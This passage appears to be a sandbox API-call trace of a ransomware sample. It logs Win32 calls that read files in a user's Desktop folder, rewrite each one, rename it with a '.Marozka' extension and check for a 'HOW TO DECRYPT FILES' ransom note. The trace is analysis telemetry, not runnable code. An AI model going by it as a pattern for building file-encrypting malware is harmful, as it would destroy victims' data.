FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0047.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0047.491] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0047.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0047.492] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt", lpFilePart=0x0) returned 0x3c [0047.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0047.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\k9h1cuco yc.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.528] GetFileType (hFile=0x2e0) returned 0x1 [0047.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0047.528] GetFileType (hFile=0x2e0) returned 0x1 [0047.528] WriteFile (in: hFile=0x2e0, lpBuffer=0x26e7b84*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x26e7b84*, lpNumberOfBytesWritten=0x5bea3c*=0x6b10, lpOverlapped=0x0) returned 1 [0047.531] CloseHandle (hObject=0x2e0) returned 1 [0047.573] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt", lpFilePart=0x0) returned 0x3c [0047.573] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt.Marozka", lpFilePart=0x0) returned 0x44 [0047.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0047.573] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\k9h1cuco yc.odt"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ed780, ftCreationTime.dwHighDateTime=0x1d4cb63, ftLastAccessTime.dwLowDateTime=0x3abf12d0, ftLastAccessTime.dwHighDateTime=0x1d4c97e, ftLastWriteTime.dwLowDateTime=0xdf14502b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x6b10)) returned 1 [0047.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0047.573] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\k9h1cuco yc.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\k9h1cuCo yC.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\k9h1cuco yc.odt.marozka")) returned 1 [0047.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt", lpFilePart=0x0) returned 0x3a [0047.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0047.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\mygdqjwlc.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.604] GetFileType (hFile=0x2e0) returned 0x1 [0047.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0047.604] GetFileType (hFile=0x2e0) returned 0x1 [0047.604] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x10317 [0047.604] ReadFile (in: hFile=0x2e0, lpBuffer=0x26eec18, nNumberOfBytesToRead=0x10317, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x26eec18*, lpNumberOfBytesRead=0x5bea48*=0x10317, lpOverlapped=0x0) returned 1 [0047.606] CloseHandle (hObject=0x2e0) returned 1 [0047.654] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0047.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0047.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0047.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0047.654] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt", lpFilePart=0x0) returned 0x3a [0047.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0047.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\mygdqjwlc.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.657] GetFileType (hFile=0x2e0) returned 0x1 [0047.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0047.658] GetFileType (hFile=0x2e0) returned 0x1 [0047.658] WriteFile (in: hFile=0x2e0, lpBuffer=0x276c378*, nNumberOfBytesToWrite=0x10320, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x276c378*, lpNumberOfBytesWritten=0x5bea3c*=0x10320, lpOverlapped=0x0) returned 1 [0047.660] CloseHandle (hObject=0x2e0) returned 1 [0047.697] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt", lpFilePart=0x0) returned 0x3a [0047.697] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt.Marozka", lpFilePart=0x0) returned 0x42 [0047.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0047.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\mygdqjwlc.ppt"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5a1d2c0, ftCreationTime.dwHighDateTime=0x1d4d571, ftLastAccessTime.dwLowDateTime=0x49445a20, ftLastAccessTime.dwHighDateTime=0x1d4cb9c, ftLastWriteTime.dwLowDateTime=0xdf239412, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x10320)) returned 1 [0047.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0047.697] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\mygdqjwlc.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\mYGdQJwLC.ppt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\mygdqjwlc.ppt.marozka")) returned 1 [0047.797] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png", lpFilePart=0x0) returned 0x3d [0047.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0047.797] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\szbn kafpczi.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.797] GetFileType (hFile=0x2e0) returned 0x1 [0047.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0047.798] GetFileType (hFile=0x2e0) returned 0x1 [0047.798] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0xeb84 [0047.798] ReadFile (in: hFile=0x2e0, lpBuffer=0x277cbfc, nNumberOfBytesToRead=0xeb84, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x277cbfc*, lpNumberOfBytesRead=0x5bea48*=0xeb84, lpOverlapped=0x0) returned 1 [0047.799] CloseHandle (hObject=0x2e0) returned 1 [0047.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0047.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0047.832] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0047.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0047.832] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png", lpFilePart=0x0) returned 0x3d [0047.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0047.832] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\szbn kafpczi.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.838] GetFileType (hFile=0x2e0) returned 0x1 [0047.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0047.838] GetFileType (hFile=0x2e0) returned 0x1 [0047.838] WriteFile (in: hFile=0x2e0, lpBuffer=0x27f5ca8*, nNumberOfBytesToWrite=0xeb90, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x27f5ca8*, lpNumberOfBytesWritten=0x5bea3c*=0xeb90, lpOverlapped=0x0) returned 1 [0047.840] CloseHandle (hObject=0x2e0) returned 1 [0047.913] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png", lpFilePart=0x0) returned 0x3d [0047.913] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png.Marozka", lpFilePart=0x0) returned 0x45 [0047.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0047.913] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\szbn kafpczi.png"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74d95f90, ftCreationTime.dwHighDateTime=0x1d4d4bc, ftLastAccessTime.dwLowDateTime=0xdca58ed0, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0xdf40d5e9, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xeb90)) returned 1 [0047.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0047.913] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\szbn kafpczi.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\SZbn KAFpCZi.png.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\szbn kafpczi.png.marozka")) returned 1 [0047.914] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png", lpFilePart=0x0) returned 0x37 [0047.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0047.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\trkczy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.915] GetFileType (hFile=0x2e0) returned 0x1 [0047.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0047.915] GetFileType (hFile=0x2e0) returned 0x1 [0047.915] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x6bda [0047.915] ReadFile (in: hFile=0x2e0, lpBuffer=0x2804d9c, nNumberOfBytesToRead=0x6bda, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x2804d9c*, lpNumberOfBytesRead=0x5bea48*=0x6bda, lpOverlapped=0x0) returned 1 [0047.916] CloseHandle (hObject=0x2e0) returned 1 [0047.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0047.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0047.990] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0047.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0047.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png", lpFilePart=0x0) returned 0x37 [0047.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0047.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\trkczy.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0047.992] GetFileType (hFile=0x2e0) returned 0x1 [0047.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0047.992] GetFileType (hFile=0x2e0) returned 0x1 [0047.992] WriteFile (in: hFile=0x2e0, lpBuffer=0x267a8c8*, nNumberOfBytesToWrite=0x6be0, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x267a8c8*, lpNumberOfBytesWritten=0x5bea3c*=0x6be0, lpOverlapped=0x0) returned 1 [0047.994] CloseHandle (hObject=0x2e0) returned 1 [0048.002] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png", lpFilePart=0x0) returned 0x37 [0048.002] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png.Marozka", lpFilePart=0x0) returned 0x3f [0048.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0048.002] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\trkczy.png"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13a0a1a0, ftCreationTime.dwHighDateTime=0x1d4c983, ftLastAccessTime.dwLowDateTime=0xf99df9a0, ftLastAccessTime.dwHighDateTime=0x1d4c7a8, ftLastWriteTime.dwLowDateTime=0xdf580993, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x6be0)) returned 1 [0048.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0048.002] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\trkczy.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\Trkczy.png.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\trkczy.png.marozka")) returned 1 [0048.003] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv", lpFilePart=0x0) returned 0x36 [0048.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0048.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\yfzaj.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.004] GetFileType (hFile=0x2e0) returned 0x1 [0048.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0048.004] GetFileType (hFile=0x2e0) returned 0x1 [0048.004] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x3deb [0048.004] ReadFile (in: hFile=0x2e0, lpBuffer=0x26819cc, nNumberOfBytesToRead=0x3deb, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x26819cc*, lpNumberOfBytesRead=0x5bea48*=0x3deb, lpOverlapped=0x0) returned 1 [0048.005] CloseHandle (hObject=0x2e0) returned 1 [0048.026] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.026] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv", lpFilePart=0x0) returned 0x36 [0048.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0048.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\yfzaj.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.027] GetFileType (hFile=0x2e0) returned 0x1 [0048.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0048.027] GetFileType (hFile=0x2e0) returned 0x1 [0048.027] WriteFile (in: hFile=0x2e0, lpBuffer=0x26e1ec4*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x26e1ec4*, lpNumberOfBytesWritten=0x5bea3c*=0x3df0, lpOverlapped=0x0) returned 1 [0048.029] CloseHandle (hObject=0x2e0) returned 1 [0048.034] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv", lpFilePart=0x0) returned 0x36 [0048.034] GetFullPathNameW (in: 